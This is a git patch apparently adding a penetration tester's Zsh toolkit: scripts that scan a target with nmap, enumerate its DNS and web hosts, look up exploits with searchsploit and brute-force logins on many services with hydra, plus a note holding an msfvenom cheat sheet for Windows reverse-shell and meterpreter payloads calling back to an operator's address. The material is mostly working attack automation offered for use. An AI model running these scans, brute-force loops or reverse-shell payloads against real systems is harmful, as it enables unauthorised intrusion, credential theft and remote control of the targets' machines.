From 51629b5b0a2e3e50c283509e29628d9e405928b7 Mon Sep 17 00:00:00 2001 From: 51x Date: Tue, 10 Jan 2017 21:55:43 +0100 Subject: [PATCH] chaoscommit 1 --- README.md | 1 + chaosdir/agro.zsh | 46 ++++++ chaosdir/chaosfunction.zsh | 272 +++++++++++++++++++++++++++++++++ chaosdir/halp/note_example.txt | 11 ++ 4 files changed, 330 insertions(+) create mode 100644 README.md create mode 100644 chaosdir/agro.zsh create mode 100644 chaosdir/chaosfunction.zsh create mode 100644 chaosdir/halp/note_example.txt diff --git a/README.md b/README.md new file mode 100644 index 0000000..447769d --- /dev/null +++ b/README.md @@ -0,0 +1 @@ +Penetration Tester's Zsh - functions 4 fast pawn diff --git a/chaosdir/agro.zsh b/chaosdir/agro.zsh new file mode 100644 index 0000000..0f3f1eb --- /dev/null +++ b/chaosdir/agro.zsh @@ -0,0 +1,46 @@ +#!/bin/zsh +# Agro scanner standalone +# License: GNU GPL v3, see LICENSE file +# Creation date: 2017.01.10. 21:30 +# Dependencies: apt-get update && apt-get install zsh nmap python2.7 libxml2-utils -y + +# Variables +targetx=(127.0.0.1) # Space delimited! +ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211) + +# Initialize directory and naming structure +cdate=$(date +"%Y-%m-%d") +mkdir -p result-$cdate +cd result-$cdate +touch scan_history.txt +echo "---- Starting AgroScanner ----" >> scan_history.txt + +# Start with standard alive scan and check ports on alive hosts + +# Get alive hosts +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt +nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out +alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ') +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt + +# Port scanning on alive hosts and version detection +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt +nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out +python ../agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out +number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this. +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt + +# Run UDP scan on most common ports +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt +nmap -sU --top-ports 50 $targetx > 4_udpscan.out +number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l) +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt + +# Vulnerability scanning +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt +nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt +#nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something +nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt + + diff --git a/chaosdir/chaosfunction.zsh b/chaosdir/chaosfunction.zsh new file mode 100644 index 0000000..e58a1b6 --- /dev/null +++ b/chaosdir/chaosfunction.zsh @@ -0,0 +1,272 @@ +#!/bin/zsh +# Agro scanner standalone +# License: GNU GPL v3, see LICENSE file +# Creation date: 2017.01.10. 21:30 +# Dependencies: apt update && apt install zsh nmap python2.7 libxml2-utils -y +# Dependencies for offensive part: apt install theharvester nmap fierce dnsrecon dnsutils hydra dirb sqlmap wget dirb curl nikto libxml2-utils whatweb +# Requires root, sry. + +# Variables +targetx=(127.0.0.1) # Space delimited! +ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211) + +# Initialize directory and naming structure +cdate=$(date +"%Y-%m-%d") +mkdir -p result-$cdate +cd result-$cdate +touch scan_history.txt +echo "---- Starting AgroScanner ----" >> scan_history.txt + +# Start with standard alive scan and check ports on alive hosts + +# Get alive hosts +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt +nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out +alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ') +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt + +# Port scanning on alive hosts and version detection +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt +nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out +python ../agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out +number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this. +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt + +# Run UDP scan on most common ports +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt +nmap -sU --top-ports 50 $targetx > 4_udpscan.out +number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l) +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt + +# Vulnerability scanning +echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt +nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt +#nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something +nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt +echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt + + + +# Offensive part +echo "Usage $0 domain.com [tor] [user wordlist] [password wordlist] [nessusURL:port] [nessususer] [nessuspassword]" + +#echo "Updating searchsploit" +#searchsploit -u + +# TODO parse arguments correctly +echo "[DEBUG] number of arguments $#" + + +# torify everything on demand +if [ $2 == "tor" ]; then echo "TOR mode ON" && torrequested=true; fi + + +# VARIABLES +currentdir=$(pwd) +# hydra protocol not bruted by nmap +hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd) +#TODO provides usernames password in args +usernames="/usr/share/nmap/nselib/data/usernames.lst" +passwords="/usr/share/nmap/nselib/data/passwords.lst" +# Nessus +nessusapi=$5 +nessususer=$6 +nessuspass=$7 + + +# TODO low priority optimize tools location if not in Kali OS +# nmap = which nmap +# fierce = which fierce ... + + +if [ $# -eq 0 ]; then echo "please provide something to pentest you dumb bear (ᵔᴥᵔ) ! :D" ; exit ; fi + +if [ "$(id -u)" != "0" ]; then + echo "This script must be run as root for Nmap scripting and syn scan." 1>&2 + exit 1 +fi + +# Attacked domain +domainattacked=$1; +echo "Domain attacked is : $domainattacked !" + + +# START RECON PART + +# Enum domain with std wordlist +echo "Enumerating domains "; +fierce -dns $1 -wide -file targets.fierce +# Dnsreconing +dnsrecon -d $domainattacked -t std,brt,srv,axfr,goo --iw -a -s -c $currentdir/targets.dnsrecon +echo "Enumerating domains ... DONE"; +# Robtex graph +echo "Getting graph of the domain infrastructure" +wget -qO $domainattacked.png "https://gfx.robtex.com/gfx/graph.png?dns=$domainattacked" +# getting a traceroute for network device mapping +traceroute $domainattacked > $domainattacked.traceroute +tcptraceroute $domainattacked 80 >> $domainattacked.traceroute +tcptraceroute $domainattacked 25 >> $domainattacked.traceroute + + +# extract IPs +cat targets.dnsrecon | grep -v 'hostnames found' | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort -u > ips.lst; +echo "IPs extracted ! Ready to shoot." +#extract IP ranges +cat targets.fierce | grep 'hostnames found' | grep -E -o "([0-9]{1,3}[\.-]){4}[0-9]{1,3}" | sort -u > ipranges.lst +echo "IPs ranges extracted as well. If you want to extend scan."; + +# LEGACY add dig ANY targets , NS , SRV , ... done by dnsrecon now +# dig +recurse +authority $domainattacked ANY | grep -v 'SERVER' | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort -u >> ips.lst; + + +# TODO extend IP detection with +# rwhois ? SPF IP ? + + +# TODO building custom userlist with harvester, add vhost and add ips ? +echo "Harvesting info about domain $domainattacked" +#theharvester -d $domainattacked -b all -v > $domainattacked.harvester +#grep IP inside .harvester + +# EXTENDING if requested extend scan to ip ranges +# nmap -sL >> ips.lst + +# CLEANING before starting if IPs added with other scripts +# cat ips.lst | sort -u > finalips.lst + + +# START SERVICES PART + +# SERVICES ENUM FINGERPRINT + NSE VULN PART +# main loop for IP +for x in `cat ips.lst`; do + + + +# create a dir per IP for db txt files + mkdir $x; + echo "Enumerating ports and services, vuln scanning and brute forcing ... jeez thats alota work"; + +# full scan +# echo "Full nmap scan start" +# nmap -sSU -p T:1-65535,U:7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831 -sV --script="(default or vuln or auth or brute or discovery) and not (broadcast or dos)" --script-args="unsafe=1,userdb=$usernames,passwd=$passwords" --host-timeout=180m --max-hostgroup=1 -Pn -v $x -oA $x/nmapresults +# reduced scan for TESTING + echo "[DEBUG] TEST MODE for nmap sS top1k ONLY" + nmap -sS -sV --script="(default or vuln or auth or brute or discovery) and not (broadcast or dos)" --host-timeout=30m --max-hostgroup=1 -Pn $x -oA $x/nmapresults + echo "Nmap fingerprinting and NSE for $x... DONE"; + +# TODO + + echo "[UNDER CONSTRUCTION] Nessus API Scan"; + echo "Starting the Nessus scan ..." + token=`curl -k -X POST -H 'Content-Type: application/json' -d '{"username":"$nessususer","password":"$nessuspassword"}' "https://$nessusurl/session"` + +# echo "Adding targets to FULL scan" +#+ call nessus api +# get results in the end + + +# TODO service / version detection for smarter brute force and searchsploit + # echo "[UNDER CONSTRUCTION] Smart protocol detection for hydra ..." + # cat nmapresults.xml | grep "port protocol" | cut -d '"' -f12 + + +#getting nmap CPE version of services and using Searchsploit +# REPORT services version and cleaning the file + echo -n "" > $x/version.services + for z in `cat $x/nmapresults.xml | grep ''`; do echo $z | grep -ozP "(?s).*?(?=)" >> $x/version.services && echo "" >> $x/version.services; done + +# REPORT exploitdb search from nmap + echo "Searching interesting vulnerabilities for target $x" + #legacy searchsploit for a in $(cat $x/version.services); do echo $a | cut -d : -f3-5 | tr ":" " " | cut -d '.' -f1 >> $x/version.exploits; done + searchsploit -v --nmap $x/nmapresults.xml > $x/version.exploits; + +# TODO ADD default credentials + + +#### Brute force non nmap +# TODO optimtize per port + echo "STARTING additional BRUTE FORCE PART with hydra"; + echo "[DEBUG] not bruting for faster testing"; + for b in ${hydrabruteprotocol[@]}; do hydra -L $usernames -P $passwords -o $x/validuserpass.hydra $b://$x; done; + echo "FINISHED additional hydra BRUTE FORCE"; + + + echo "Enumerating ports and services, fingerprinting, vuln scanning and brute forcing .... DONE "; + + +##################### STOP SERVICES PART + + +###################### START WEB PART +#### WEB VULNS PART + echo "Web pentesting now ..."; +# vhost enum + echo "Vhost enum" +# adding the IP as vhost , often forgotten + echo "$x" >> $x/vhost.list; +# manual reverse PTR in case there is none + cat targets.dnsrecon | grep $x | grep '^A' | cut -d ',' -f2 >> $x/vhost.list; +# reverse PTR + dig +short -x $x >> $x/vhost.list; +# using robtex from nmap + awk '/hostmap-robtex/{f=1;next} /ip-geolocation-geoplugin/{f=0} f' $x/nmapresults.nmap >> $x/vhost.list; # extract vhosts from NMAP robtex script +# adding hackertarget vhost + timeout 2m curl "http://api.hackertarget.com/reverseiplookup/?q=$x" >> vhost.list; +# TO DO add harvester ? +# sorting vhosts + sort -u $x/vhost.list > $x/vhost.sorted; + +echo "Start port loop for $x" + +# if HTTP port test + for y in `cat $x/nmapresults.nmap | grep '/tcp' | grep ' http ' | cut -d '/' -f1`; + ### WEB RECON + do echo "start vhost loop for IP $y"; + for z in `cat $x/vhost.sorted`; + # dirb for each vhost + do dirb "http://$z:$y" -f -l > "$x/enum$z.dirb"; + ### WEB fingerprint + whatweb -v "http://$z:$y"; + # nikto for each vhost + nikto -host "http://$z:$y" > "$x/$z.nikto"; + + # arachni + # arachni + + # sqlmap for earch vhost + #sqlmap --crawl=2 --forms --batch + + done; ## end vhost loop + done; ## end nmap port loop + + +# if HTTPS port +# TO DO again +# copy pasta +# for y in `cat $x/nmapresults.nmap | grep '/tcp' | grep 'ssl/http' | cut -d '/' -f1`; + +done; ## end IP loop + + +# REPORT VULNS FOUND +echo "======================================" +echo "Vulnerability summary from NSE Scripts" +echo "" +grep -i "vulner" -B1 */nmapresults.nmap +echo "You might also need to read manually also the .nmap as vulnerable state is not harmonized through NSE" +echo "" + +echo "======================================" +echo "ExploitDB research results" +echo "" +echo "Interesting exploits found: " +cat */version.exploits +echo "" + +echo "======================================" +echo "Bruteforce results" +echo "" +echo "Valid passwords found: " +cat */validuserpass.hydra +echo "" diff --git a/chaosdir/halp/note_example.txt b/chaosdir/halp/note_example.txt new file mode 100644 index 0000000..79060ba --- /dev/null +++ b/chaosdir/halp/note_example.txt @@ -0,0 +1,11 @@ +C0nn3ctz shell meterpreter windows + +c00nt3nt + +Windows msfvenom cheat sheet +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe +msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf +msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED +msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport